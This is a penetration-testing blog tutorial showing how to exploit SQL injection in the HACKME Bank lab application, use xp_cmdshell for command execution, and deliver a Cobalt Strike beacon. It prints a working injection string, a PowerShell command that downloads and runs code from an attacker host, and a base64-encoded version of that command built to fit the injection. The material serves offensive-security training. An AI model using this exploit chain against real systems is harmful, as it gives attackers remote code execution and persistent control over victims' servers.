Hunnic Cyber - Logo

SQL Injection & xp_cmdshell to Cobalt Strike Beacon

Introduction

In this blog post I am going to be running you through how to get a Cobalt Strike beacon back from a SQL injection manually through XP_CMDSHELL.

In order to run through this we will first need to set up an environment to work with. For this, we will be using Windows Server 2003 with HACKME Bank installed. Please refer to this guide to get you up and running.

Once you have successfully installed HACKME Bank on a Windows Server 2003 virtual machine, you will need to install some additional service packs to get Powershell running on the machine. Another useful guide for installing Powershell can be found here.

If you have any difficulty then please just comment below and I will do my best to troubleshoot the problems you are facing.

SQL Injection

Assuming you are all set up, when you browse to your virtual machine’s IP address on the local network you should see the login page for HACKME Bank:

In fact both the user-name and password parameters are vulnerable to a SQL Injection and by inserting an ‘, we can see that the SQL query breaks and throws an error:

So let’s open Burp Suite (Pro or Free) and send the request to Repeater. There we will use XP_CMDSHELL to ping our machine.

Above and below you can see the the what was entered into the injection point to achieve this.

a';EXEC+MASTER..xp_cmdshell+'ping+192.168.0.109'--

Your view state and IP address will be different, so copying the above in it’s entirety into Burp will not work. Before we submit the request we will set our local machine to listen for ICMP traffic with the following command:

sudo tcpdump -i eth0 icmp

Now we can submit the request and see that we achieve code execution:

So far so good. Next will be the purpose of the post – how can we achieve a Cobalt Strike beacon from this injection point.

At first it seems simple; execute a command. However owing the fact that we are doing this manually without the help of SQLMAP (particularly as in this example stacked queries are not supported) getting the syntax correct can prove challenging and I am going to show you the easy way.

Cobalt Strike

So let’s fire up Cobalt Strike by launching the teamserver:

./teamserver ipaddress password

And connecting to it with the GUI.

Next we will want to set up a listener and bind it to port 80. If you have apache running you will have to stop it:

service apache2 stop

So open Cobalt Strike > Listeners and choose a name, payload and port as below:

Click OK and OK on the next two screens.

Next you will want to generate a scripted web delivery. So Attacks > Web Drive By > Scripted Web Delivery. Here set the URI path, port, listener and use Powershell for the Type as below:

Then click launch and copy the command:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:80/b'))"

Now if we were to simply copy and past this command into Burp where our ping command was, it would not work as it would break the SQL query. So we will have to get a little bit creative and encode the command in base64.

Powershell lets you do this in a pretty easy way. The following steps will let you encode the command so let’s open up Powershell ISE. I will be doing this on Windows 8.1 virtual machine, but you can do this however it suits you.

#Encode Command
  $command = "command”
  $bytes = [Text.Encoding]::Unicode.GetBytes($command)
  $encodedCommand = [Convert]::ToBase64String($bytes)
  echo $encodedCommand
  #Execute command
  powershell.exe -EncodedCommand $encodedcommand

So first, as above we will take our Cobalt Strike generated command and enter it into the the command section of the first line:

$command = "IEX ((new-object net.webclient).downloadstring('http://192.168.0.109:80/b'))"

and enter this into the Powershell shell in ISE:

Then the next section:

Then the third:

And finally we will echo back the encoded command that we have generated:

We now have the following encoded command (Note your’s will be different):

SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAA5ADoAOAAwAC8AYgAnACkAKQA=

So let’s test it in ISE and see if it works. Enter the following command, bearing in mind to substitute your own base64 encoded command for the one below:

powershell.exe -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAA5ADoAOAAwAC8AYgAnACkAKQA=

You should now have a beacon on from the Windows Virtual Machine where you ran the encoded command from:

So we now know that the Powershell command encoded works, so let use it in the injection point in Burp.

Now once you submit the request you should have a beacon from HACKME Bank, alongside your earlier beacon :

In the next post I will be discussing how you can leverage a DNS shell through XP_CMDSHELL with DNSCAT.

Please comment below if you have any thoughts.